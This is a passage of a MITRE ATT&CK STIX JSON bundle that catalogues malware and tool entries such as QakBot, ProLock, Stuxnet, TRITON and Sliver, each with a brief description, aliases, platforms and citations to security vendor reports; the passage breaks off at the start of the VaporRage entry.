"url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
},
{
"source_name": "SentinelOne NobleBaron June 2021",
"description": "Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.",
"url": "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"NativeZone"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--22b17791-45bf-45c0-9322-ff1a0af5cf2b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-30 14:44:35.055000+00:00",
"modified": "2021-10-15 22:57:32.775000+00:00",
"name": "Nebulae",
"description": "[Nebulae](https://attack.mitre.org/software/S0630) Is a backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0630",
"external_id": "S0630"
},
{
"source_name": "Bitdefender Naikon April 2021",
"description": "Vrabie, V. (2021, April 23). NAIKON \u2013 Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.",
"url": "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Nebulae"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--5864e59f-eb4c-43ad-83b2-b5e4fae056c9",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-08 19:53:27.937000+00:00",
"modified": "2021-10-15 14:43:12.250000+00:00",
"name": "ObliqueRAT",
"description": "[ObliqueRAT](https://attack.mitre.org/software/S0644) is a remote access trojan, similar to [Crimson](https://attack.mitre.org/software/S0115), that has been in use by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2020.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0644",
"external_id": "S0644"
},
{
"source_name": "Talos Oblique RAT March 2021",
"description": "Malhotra, A. (2021, March 2). ObliqueRAT returns with new campaign using hijacked websites. Retrieved September 2, 2021.",
"url": "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html"
},
{
"source_name": "Talos Transparent Tribe May 2021",
"description": "Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021.",
"url": "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"ObliqueRAT"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--7c58fff0-d206-4db1-96b1-e3a9e0e320b9",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-21 15:02:47.928000+00:00",
"modified": "2021-10-14 23:25:08.267000+00:00",
"name": "P8RAT",
"description": "[P8RAT](https://attack.mitre.org/software/S0626) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0626",
"external_id": "S0626"
},
{
"source_name": "HEAVYPOT",
"description": "(Citation: Securelist APT10 March 2021)"
},
{
"source_name": "GreetCake",
"description": "(Citation: Securelist APT10 March 2021)"
},
{
"source_name": "Securelist APT10 March 2021",
"description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.",
"url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"P8RAT",
"HEAVYPOT",
"GreetCake"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--13183cdf-280b-46be-913a-5c6df47831e7",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-05-24 14:55:59.316000+00:00",
"modified": "2021-10-15 12:58:20.120000+00:00",
"name": "PS1",
"description": "[PS1](https://attack.mitre.org/software/S0613) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0613",
"external_id": "S0613"
},
{
"source_name": "BlackBerry CostaRicto November 2020",
"description": "The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.",
"url": "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"PS1",
"PS1 "
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--6c2550d5-a01a-4bbb-a004-6ead348ba623",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-07 15:11:17.444000+00:00",
"modified": "2021-10-15 15:09:54.978000+00:00",
"name": "Peppy",
"description": "[Peppy](https://attack.mitre.org/software/S0643) is a Python-based remote access Trojan, active since at least 2012, with similarities to [Crimson](https://attack.mitre.org/software/S0115).(Citation: Proofpoint Operation Transparent Tribe March 2016)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0643",
"external_id": "S0643"
},
{
"source_name": "Proofpoint Operation Transparent Tribe March 2016",
"description": "Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.",
"url": "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Peppy"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--471d0e9f-2c8a-4e4b-8f3b-f85d2407806e",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-30 19:47:47.136000+00:00",
"modified": "2021-10-15 21:35:09.832000+00:00",
"name": "ProLock",
"description": "[ProLock](https://attack.mitre.org/software/S0654) is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with [QakBot](https://attack.mitre.org/software/S0650). [ProLock](https://attack.mitre.org/software/S0654) is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.(Citation: Group IB Ransomware September 2020)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0654",
"external_id": "S0654"
},
{
"source_name": "Group IB Ransomware September 2020",
"description": "Group IB. (2020, September). LOCK LIKE A PRO. Retrieved September 27, 2021.",
"url": "https://groupib.pathfactory.com/ransomware-reports/prolock_wp"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"ProLock"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--edc5e045-5401-42bb-ad92-52b5b2ee0de9",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-27 19:35:35.326000+00:00",
"modified": "2021-10-15 21:47:13.084000+00:00",
"name": "QakBot",
"description": "[QakBot](https://attack.mitre.org/software/S0650) is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. [QakBot](https://attack.mitre.org/software/S0650) is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably [ProLock](https://attack.mitre.org/software/S0654) and [Egregor](https://attack.mitre.org/software/S0554).(Citation: Trend Micro Qakbot December 2020)(Citation: Red Canary Qbot)(Citation: Kaspersky QakBot September 2021)(Citation: ATT QakBot April 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0650",
"external_id": "S0650"
},
{
"source_name": "Pinkslipbot",
"description": "(Citation: Kaspersky QakBot September 2021)(Citation: ATT QakBot April 2021)"
},
{
"source_name": "QuackBot",
"description": "(Citation: Kaspersky QakBot September 2021)"
},
{
"source_name": "QBot",
"description": "(Citation: Trend Micro Qakbot December 2020)(Citation: Red Canary Qbot)(Citation: Kaspersky QakBot September 2021)(Citation: ATT QakBot April 2021)"
},
{
"source_name": "Trend Micro Qakbot December 2020",
"description": "Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021.",
"url": "https://success.trendmicro.com/solution/000283381"
},
{
"source_name": "Red Canary Qbot",
"description": "Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021.",
"url": "https://redcanary.com/threat-detection-report/threats/qbot/"
},
{
"source_name": "Kaspersky QakBot September 2021",
"description": "Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.",
"url": "https://securelist.com/qakbot-technical-analysis/103931/"
},
{
"source_name": "ATT QakBot April 2021",
"description": "Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021.",
"url": "https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"QakBot",
"Pinkslipbot",
"QuackBot",
"QBot"
],
"x_mitre_contributors": [
"Edward Millington"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--29231689-5837-4a7a-aafc-1b65b3f50cc7",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-29 14:46:45.468000+00:00",
"modified": "2021-08-19 19:14:14.922000+00:00",
"name": "RainyDay",
"description": "[RainyDay](https://attack.mitre.org/software/S0629) is a backdoor tool that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0629",
"external_id": "S0629"
},
{
"source_name": "Bitdefender Naikon April 2021",
"description": "Vrabie, V. (2021, April 23). NAIKON \u2013 Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.",
"url": "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"RainyDay"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--7e0f8b0f-716e-494d-827e-310bd6ed709e",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-22 20:11:08.678000+00:00",
"modified": "2021-10-14 20:12:16.269000+00:00",
"name": "SMOKEDHAM",
"description": "[SMOKEDHAM](https://attack.mitre.org/software/S0649) is a Powershell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0649",
"external_id": "S0649"
},
{
"source_name": "SMOKEDHAM",
"description": "(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)"
},
{
"source_name": "FireEye Shining A Light on DARKSIDE May 2021",
"description": "FireEye. (2021, May 11). Shining a Light on DARKSIDE Ransomware Operations. Retrieved September 22, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
},
{
"source_name": "FireEye SMOKEDHAM June 2021",
"description": "FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate\u2019s Supply Chain Software Compromise. Retrieved September 22, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"SMOKEDHAM"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--f931a0b9-0361-4b1b-bacf-955062c35746",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-08-13 14:57:39.387000+00:00",
"modified": "2021-10-13 14:17:43.705000+00:00",
"name": "Seth-Locker",
"description": "[Seth-Locker](https://attack.mitre.org/software/S0639) is a ransomware with some remote control capabilities that has been in use since at least 2021.\n(Citation: Trend Micro Ransomware February 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0639",
"external_id": "S0639"
},
{
"source_name": "Trend Micro Ransomware February 2021",
"description": "Centero, R. et al. (2021, February 5). New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker. Retrieved August 11, 2021.",
"url": "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Seth-Locker"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--df4cd566-ff2f-4d08-976d-8c86e95782de",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-05-06 14:44:50.494000+00:00",
"modified": "2021-10-13 13:53:26.301000+00:00",
"name": "SideTwist",
"description": "[SideTwist](https://attack.mitre.org/software/S0610) is a C-based backdoor that has been used by [OilRig](https://attack.mitre.org/groups/G0049) since at least 2021.(Citation: Check Point APT34 April 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0610",
"external_id": "S0610"
},
{
"source_name": "Check Point APT34 April 2021",
"description": "Check Point. (2021, April 8). Iran\u2019s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.",
"url": "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"SideTwist"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--4fbd565b-bf55-4ac7-80b4-b183a7b64b9c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-18 15:26:55.509000+00:00",
"modified": "2021-10-18 13:42:10.432000+00:00",
"name": "Siloscape",
"description": "[Siloscape](https://attack.mitre.org/software/S0623) is malware that targets Kubernetes clusters through Windows containers. [Siloscape](https://attack.mitre.org/software/S0623) was first observed in March 2021.(Citation: Unit 42 Siloscape Jun 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0623",
"external_id": "S0623"
},
{
"source_name": "Unit 42 Siloscape Jun 2021",
"description": "Prizmant, D. (2021, June 7). Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments. Retrieved June 9, 2021.",
"url": "https://unit42.paloaltonetworks.com/siloscape/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Siloscape"
],
"x_mitre_contributors": [
"Daniel Prizmant, Palo Alto Networks",
"Yuval Avrahami, Palo Alto Networks"
],
"x_mitre_platforms": [
"Windows",
"Containers"
],
"x_mitre_version": "1.0"
},
{
"type": "tool",
"id": "tool--11f8d7eb-1927-4806-9267-3a11d4d4d6be",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-07-30 15:43:17.770000+00:00",
"modified": "2021-10-15 15:49:25.284000+00:00",
"name": "Sliver",
"description": "[Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control framework written in Golang.(Citation: Bishop Fox Sliver Framework August 2019)",
"revoked": false,
"labels": [
"tool"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0633",
"external_id": "S0633"
},
{
"source_name": "Bishop Fox Sliver Framework August 2019",
"description": "Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021.",
"url": "https://labs.bishopfox.com/tech-blog/sliver"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Sliver"
],
"x_mitre_contributors": [
"Achute Sharma, Keysight",
"Ayan Saha, Keysight"
],
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--94d6d788-07bb-4dcc-b62f-e02626b00108",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-21 15:52:14.624000+00:00",
"modified": "2021-10-11 15:50:25.945000+00:00",
"name": "SodaMaster",
"description": "[SodaMaster](https://attack.mitre.org/software/S0627) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0627",
"external_id": "S0627"
},
{
"source_name": "DARKTOWN",
"description": "(Citation: Securelist APT10 March 2021)"
},
{
"source_name": "dfls",
"description": "(Citation: Securelist APT10 March 2021)"
},
{
"source_name": "DelfsCake",
"description": "(Citation: Securelist APT10 March 2021)"
},
{
"source_name": "Securelist APT10 March 2021",
"description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.",
"url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"SodaMaster",
"DARKTOWN",
"dfls",
"DelfsCake"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--425771c5-48b4-4ecd-9f95-74ed3fc9da59",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-05-26 13:13:43.366000+00:00",
"modified": "2021-10-15 23:39:53.415000+00:00",
"name": "SombRAT",
"description": "[SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been in use since at least 2019. [SombRAT](https://attack.mitre.org/software/S0615) has been used to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0615",
"external_id": "S0615"
},
{
"source_name": "BlackBerry CostaRicto November 2020",
"description": "The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.",
"url": "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced"
},
{
"source_name": "FireEye FiveHands April 2021",
"description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
},
{
"source_name": "CISA AR21-126A FIVEHANDS May 2021",
"description": "CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.",
"url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"SombRAT"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--599cd7b5-37b5-4cdd-8174-2811531ce9d0",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-21 14:55:00.996000+00:00",
"modified": "2021-10-18 16:42:45.608000+00:00",
"name": "SpicyOmelette",
"description": "[SpicyOmelette](https://attack.mitre.org/software/S0646) is a JavaScript based remote access tool that has been used by [Cobalt Group](https://attack.mitre.org/groups/G0080) since at least 2018.(Citation: Secureworks GOLD KINGSWOOD September 2018)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0646",
"external_id": "S0646"
},
{
"source_name": "Secureworks GOLD KINGSWOOD September 2018",
"description": "CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.",
"url": "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"SpicyOmelette"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-12-14 17:34:58.457000+00:00",
"modified": "2021-10-12 21:50:58.905000+00:00",
"name": "Stuxnet",
"description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0603",
"external_id": "S0603"
},
{
"source_name": "W32.Stuxnet",
"description": "(Citation: Symantec W.32 Stuxnet Dossier)"
},
{
"source_name": "Symantec W.32 Stuxnet Dossier",
"description": "Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.",
"url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf "
},
{
"source_name": "CISA ICS Advisory ICSA-10-272-01",
"description": "CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.",
"url": "https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01"
},
{
"source_name": "ESET Stuxnet Under the Microscope",
"description": "Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.",
"url": "https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf"
},
{
"source_name": "Langer Stuxnet",
"description": "Ralph Langner. (2013, November). Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.",
"url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Stuxnet",
"W32.Stuxnet"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--93ae2edf-a598-4d2d-acd7-bcae0c021923",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-01-11 21:27:41.573000+00:00",
"modified": "2021-05-04 19:10:43.045000+00:00",
"name": "TRITON",
"description": "[TRITON](https://attack.mitre.org/software/S0609) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. [TRITON](https://attack.mitre.org/software/S0609) was deployed against at least one target in the Middle East. (Citation: FireEye TRITON 2017)(Citation: FireEye TRITON 2018)(Citation: Dragos TRISIS)(Citation: CISA HatMan)(Citation: FireEye TEMP.Veles 2018)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0609",
"external_id": "S0609"
},
{
"source_name": "FireEye TRITON 2017",
"description": "Johnson, B, et. al. (2017, December 14). Attackers Deploy New ICS Attack Framework \"TRITON\" and Cause Operational Disruption to Critical Infrastructure. Retrieved January 6, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html"
},
{
"source_name": "FireEye TRITON 2018",
"description": "Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved January 6, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-TRITON-and-tristation.html"
},
{
"source_name": "Dragos TRISIS",
"description": "Dragos. (2017, December 13). TRISIS Malware Analysis of Safety System Targeted Malware. Retrieved January 6, 2021.",
"url": "https://www.dragos.com/wp-content/uploads/TRISIS-01.pdf"
},
{
"source_name": "CISA HatMan",
"description": "CISA. (2019, February 27). MAR-17-352-01 HatMan-Safety System Targeted Malware. Retrieved January 6, 2021.",
"url": "https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf"
},
{
"source_name": "FireEye TEMP.Veles 2018",
"description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.",
"url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html "
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"TRITON",
"HatMan",
"TRISIS"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--350f12cf-fd3b-4dad-b323-14b943090df4",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-21 15:21:31.795000+00:00",
"modified": "2021-10-18 13:19:48.020000+00:00",
"name": "Turian",
"description": "[Turian](https://attack.mitre.org/software/S0647) is a backdoor that has been used by [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, [Turian](https://attack.mitre.org/software/S0647) is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.(Citation: ESET BackdoorDiplomacy Jun 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0647",
"external_id": "S0647"
},
{
"source_name": "ESET BackdoorDiplomacy Jun 2021",
"description": "Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021",
"url": "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Turian"
],
"x_mitre_contributors": [
"Zaw Min Htun, @Z3TAE"
],
"x_mitre_platforms": [
"Windows",
"Linux"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--96eca9b9-b37f-42f1-96dc-a2c441403194",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-08-04 15:02:56.965000+00:00",
"modified": "2021-08-04 15:46:36.800000+00:00",
"name": "VaporRage",
